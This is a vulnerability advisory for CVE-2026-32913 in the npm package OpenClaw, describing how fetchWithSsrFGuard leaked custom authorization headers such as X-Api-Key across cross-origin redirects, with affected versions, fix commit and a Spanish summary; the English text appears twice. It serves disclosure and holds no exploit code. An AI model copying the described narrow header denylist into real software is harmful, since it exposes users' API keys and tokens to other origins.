CVE-2026-32913

OpenClaw before 2026.3.7 contains an improper header validation vulnerability in fetchWithSsrFGuard that forwards custom authorization headers across cross-origin redirects. Attackers can trigger redirects to different origins to intercept sensitive headers like X-Api-Key and Private-Token intended for the original destination.

OpenClaw before 2026.3.7 contains an improper header validation vulnerability in fetchWithSsrFGuard that forwards custom authorization headers across cross-origin redirects. Attackers can trigger redirects to different origins to intercept sensitive headers like X-Api-Key and Private-Token intended for the original destination.

OpenClaw's `fetchWithSsrFGuard(...)` followed cross-origin redirects while preserving arbitrary caller-supplied headers except for a narrow denylist (`Authorization`, `Proxy-Authorization`, `Cookie`, `Cookie2`). This allowed custom authorization headers such as `X-Api-Key`, `Private-Token`, and similar sensitive headers to be forwarded to a different origin after a redirect. The fix switches cross-origin redirect handling from a narrow sensitive-header denylist to a safe-header allowlist, so only benign headers such as content negotiation and cache validators survive an origin change. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.3.2` - Patched version: `2026.3.7` - Latest published npm version at patch time: `2026.3.2` ## Impact A remote service that could trigger a redirect across origins could receive custom authorization credentials attached by OpenClaw callers. This can expose API keys, bearer-style custom headers, or private token headers intended only for the original destination. ## Fix Commit(s) - `46715371b0612a6f9114dffd1466941ac476cef5` ## Verification - `pnpm check` passed - `pnpm test:fast` passed - Focused redirect regression tests passed - `pnpm exec vitest run --config vitest.gateway.config.ts` still has unrelated current-`main` failures in `src/gateway/server-channels.test.ts` and `src/gateway/server-methods/agents-mutate.test.ts` ## Release Process Note npm `2026.3.7` was published on March 8, 2026. This advisory is fixed in the released package. Thanks @Rickidevs for reporting.

OpenClaw's `fetchWithSsrFGuard(...)` followed cross-origin redirects while preserving arbitrary caller-supplied headers except for a narrow denylist (`Authorization`, `Proxy-Authorization`, `Cookie`, `Cookie2`). This allowed custom authorization headers such as `X-Api-Key`, `Private-Token`, and similar sensitive headers to be forwarded to a different origin after a redirect. The fix switches cross-origin redirect handling from a narrow sensitive-header denylist to a safe-header allowlist, so only benign headers such as content negotiation and cache validators survive an origin change. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.3.2` - Patched version: `2026.3.7` - Latest published npm version at patch time: `2026.3.2` ## Impact A remote service that could trigger a redirect across origins could receive custom authorization credentials attached by OpenClaw callers. This can expose API keys, bearer-style custom headers, or private token headers intended only for the original destination. ## Fix Commit(s) - `46715371b0612a6f9114dffd1466941ac476cef5` ## Verification - `pnpm check` passed - `pnpm test:fast` passed - Focused redirect regression tests passed - `pnpm exec vitest run --config vitest.gateway.config.ts` still has unrelated current-`main` failures in `src/gateway/server-channels.test.ts` and `src/gateway/server-methods/agents-mutate.test.ts` ## Release Process Note npm `2026.3.7` was published on March 8, 2026. This advisory is fixed in the released package. Thanks @Rickidevs for reporting.

OpenClaw anterior a 2026.3.7 contiene una vulnerabilidad de validación de encabezado indebida en fetchWithSsrFGuard que reenvía encabezados de autorización personalizados a través de redirecciones de origen cruzado. Los atacantes pueden desencadenar redirecciones a diferentes orígenes para interceptar encabezados sensibles como X-Api-Key y Private-Token destinados al destino original.